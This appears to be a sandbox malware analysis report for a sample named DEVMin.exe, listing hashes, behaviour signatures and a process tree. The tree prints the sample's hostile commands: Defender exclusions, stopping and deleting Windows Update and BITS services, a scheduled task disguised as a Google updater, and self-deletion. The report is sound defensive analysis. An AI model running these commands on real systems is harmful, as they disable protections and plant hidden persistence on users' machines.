Overview
overview
10Static
static
106523.exe
windows7-x64
106523.exe
windows10-2004-x64
10Amdau.exe
windows7-x64
10Amdau.exe
windows10-2004-x64
10CLEP.exe
windows7-x64
10CLEP.exe
windows10-2004-x64
10DCKA.exe
windows7-x64
10DCKA.exe
windows10-2004-x64
10DEV.exe
windows7-x64
10DEV.exe
windows10-2004-x64
10DEVMin.exe
windows7-x64
10DEVMin.exe
windows10-2004-x64
10DevSt.exe
windows7-x64
1DevSt.exe
windows10-2004-x64
1Documents-...uz.exe
windows7-x64
7Documents-...uz.exe
windows10-2004-x64
5IqXYLXKzl6.exe
windows7-x64
IqXYLXKzl6.exe
windows10-2004-x64
1LEMON.exe
windows7-x64
10LEMON.exe
windows10-2004-x64
10LIMMin.exe
windows7-x64
10LIMMin.exe
windows10-2004-x64
10LIMSt.exe
windows7-x64
1LIMSt.exe
windows10-2004-x64
1LK2.exe
windows7-x64
10LK2.exe
windows10-2004-x64
10NINJA.exe
windows7-x64
7NINJA.exe
windows10-2004-x64
7PolymodXT.exe
windows7-x64
10PolymodXT.exe
windows10-2004-x64
10UM.exe
windows7-x64
10UM.exe
windows10-2004-x64
10Analysis
-
max time kernel
121s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-10-2023 02:17
Behavioral task
behavioral1
Sample
6523.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
6523.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
Amdau.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
Amdau.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
CLEP.exe
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
CLEP.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
DCKA.exe
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
DCKA.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
DEV.exe
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
DEV.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
DEVMin.exe
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
DEVMin.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
DevSt.exe
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
DevSt.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
Documents-EnemyFrauz.exe
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
Documents-EnemyFrauz.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
IqXYLXKzl6.exe
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
IqXYLXKzl6.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
LEMON.exe
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
LEMON.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
LIMMin.exe
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
LIMMin.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
LIMSt.exe
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
LIMSt.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
LK2.exe
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
LK2.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
NINJA.exe
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
NINJA.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
PolymodXT.exe
Resource
win7-20230831-en
Behavioral task
behavioral30
Sample
PolymodXT.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral31
Sample
UM.exe
Resource
win7-20230831-en
Behavioral task
behavioral32
Sample
UM.exe
Resource
win10v2004-20230915-en
General
-
Target
DEVMin.exe
-
Size
3.6MB
-
MD5
279c66b28f19a510ad6c0f155871fac3
-
SHA1
427bcf049de4b9a848593463e0f36265baa6164c
-
SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164
-
SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161
-
SSDEEP
98304:JHmeIFVx0/o2Jrd9o2oNiN0KL5Zm2kVehky:DIFVxQJM2eRZfQhky
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2096 created 1400 2096 DEVMin.exe 11 PID 2096 created 1400 2096 DEVMin.exe 11 PID 2096 created 1400 2096 DEVMin.exe 11 PID 2096 created 1400 2096 DEVMin.exe 11 PID 2096 created 1400 2096 DEVMin.exe 11 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts DEVMin.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 564 cmd.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2528 sc.exe 2444 sc.exe 2392 sc.exe 2452 sc.exe 2464 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2372 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2096 DEVMin.exe 2096 DEVMin.exe 2612 powershell.exe 2096 DEVMin.exe 2096 DEVMin.exe 2096 DEVMin.exe 2096 DEVMin.exe 2096 DEVMin.exe 2096 DEVMin.exe 2424 powershell.exe 2096 DEVMin.exe 2096 DEVMin.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe Token: SeShutdownPrivilege 2564 powercfg.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeShutdownPrivilege 2836 powercfg.exe Token: SeShutdownPrivilege 1072 powercfg.exe Token: SeShutdownPrivilege 1652 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2572 wrote to memory of 2528 2572 cmd.exe 37 PID 2572 wrote to memory of 2528 2572 cmd.exe 37 PID 2572 wrote to memory of 2528 2572 cmd.exe 37 PID 2508 wrote to memory of 2564 2508 cmd.exe 38 PID 2508 wrote to memory of 2564 2508 cmd.exe 38 PID 2508 wrote to memory of 2564 2508 cmd.exe 38 PID 2572 wrote to memory of 2444 2572 cmd.exe 39 PID 2572 wrote to memory of 2444 2572 cmd.exe 39 PID 2572 wrote to memory of 2444 2572 cmd.exe 39 PID 2572 wrote to memory of 2392 2572 cmd.exe 40 PID 2572 wrote to memory of 2392 2572 cmd.exe 40 PID 2572 wrote to memory of 2392 2572 cmd.exe 40 PID 2572 wrote to memory of 2452 2572 cmd.exe 41 PID 2572 wrote to memory of 2452 2572 cmd.exe 41 PID 2572 wrote to memory of 2452 2572 cmd.exe 41 PID 2572 wrote to memory of 2464 2572 cmd.exe 44 PID 2572 wrote to memory of 2464 2572 cmd.exe 44 PID 2572 wrote to memory of 2464 2572 cmd.exe 44 PID 2508 wrote to memory of 2836 2508 cmd.exe 42 PID 2508 wrote to memory of 2836 2508 cmd.exe 42 PID 2508 wrote to memory of 2836 2508 cmd.exe 42 PID 2572 wrote to memory of 3000 2572 cmd.exe 43 PID 2572 wrote to memory of 3000 2572 cmd.exe 43 PID 2572 wrote to memory of 3000 2572 cmd.exe 43 PID 2508 wrote to memory of 1072 2508 cmd.exe 46 PID 2508 wrote to memory of 1072 2508 cmd.exe 46 PID 2508 wrote to memory of 1072 2508 cmd.exe 46 PID 2572 wrote to memory of 568 2572 cmd.exe 45 PID 2572 wrote to memory of 568 2572 cmd.exe 45 PID 2572 wrote to memory of 568 2572 cmd.exe 45 PID 2572 wrote to memory of 1428 2572 cmd.exe 48 PID 2572 wrote to memory of 1428 2572 cmd.exe 48 PID 2572 wrote to memory of 1428 2572 cmd.exe 48 PID 2508 wrote to memory of 1652 2508 cmd.exe 47 PID 2508 wrote to memory of 1652 2508 cmd.exe 47 PID 2508 wrote to memory of 1652 2508 cmd.exe 47 PID 2572 wrote to memory of 576 2572 cmd.exe 51 PID 2572 wrote to memory of 576 2572 cmd.exe 51 PID 2572 wrote to memory of 576 2572 cmd.exe 51 PID 2572 wrote to memory of 1344 2572 cmd.exe 49 PID 2572 wrote to memory of 1344 2572 cmd.exe 49 PID 2572 wrote to memory of 1344 2572 cmd.exe 49 PID 2424 wrote to memory of 2372 2424 powershell.exe 50 PID 2424 wrote to memory of 2372 2424 powershell.exe 50 PID 2424 wrote to memory of 2372 2424 powershell.exe 50 PID 564 wrote to memory of 2656 564 cmd.exe 54 PID 564 wrote to memory of 2656 564 cmd.exe 54 PID 564 wrote to memory of 2656 564 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2528
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2444
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2392
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2452
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3000
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2464
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:568
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1428
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1344
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:2372
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50dc3c6c2d5baf07b319695ec918a165f
SHA1bdea163046192f063e2bbbe356e833a38e05dfb2
SHA256115a72a1089fa1694660bca4456d80d9b51e3d661994535b793d5362c573d898
SHA5127a72e0f7f29337695da8d82da75ce0aa8126a3cf4752e3fe5bee0bb7f05a79ca5f3cca9d420228d271d2e51280fa3ca05384aade1a9c0b0a2001f8cc06aa3d0c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WO9EN4PJN92SUKVXI8RT.temp
Filesize7KB
MD50dc3c6c2d5baf07b319695ec918a165f
SHA1bdea163046192f063e2bbbe356e833a38e05dfb2
SHA256115a72a1089fa1694660bca4456d80d9b51e3d661994535b793d5362c573d898
SHA5127a72e0f7f29337695da8d82da75ce0aa8126a3cf4752e3fe5bee0bb7f05a79ca5f3cca9d420228d271d2e51280fa3ca05384aade1a9c0b0a2001f8cc06aa3d0c